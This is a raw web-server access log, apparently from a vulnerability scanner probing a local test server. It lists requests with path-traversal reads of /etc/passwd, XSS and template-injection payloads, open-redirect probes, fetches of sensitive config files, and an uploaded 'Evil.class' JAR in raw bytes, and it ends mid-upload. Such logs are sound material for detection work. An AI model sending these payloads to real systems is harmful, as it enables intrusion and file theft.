/wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.356","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KAY5IIAHi0SHx6dCRs8Bx7m7h.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 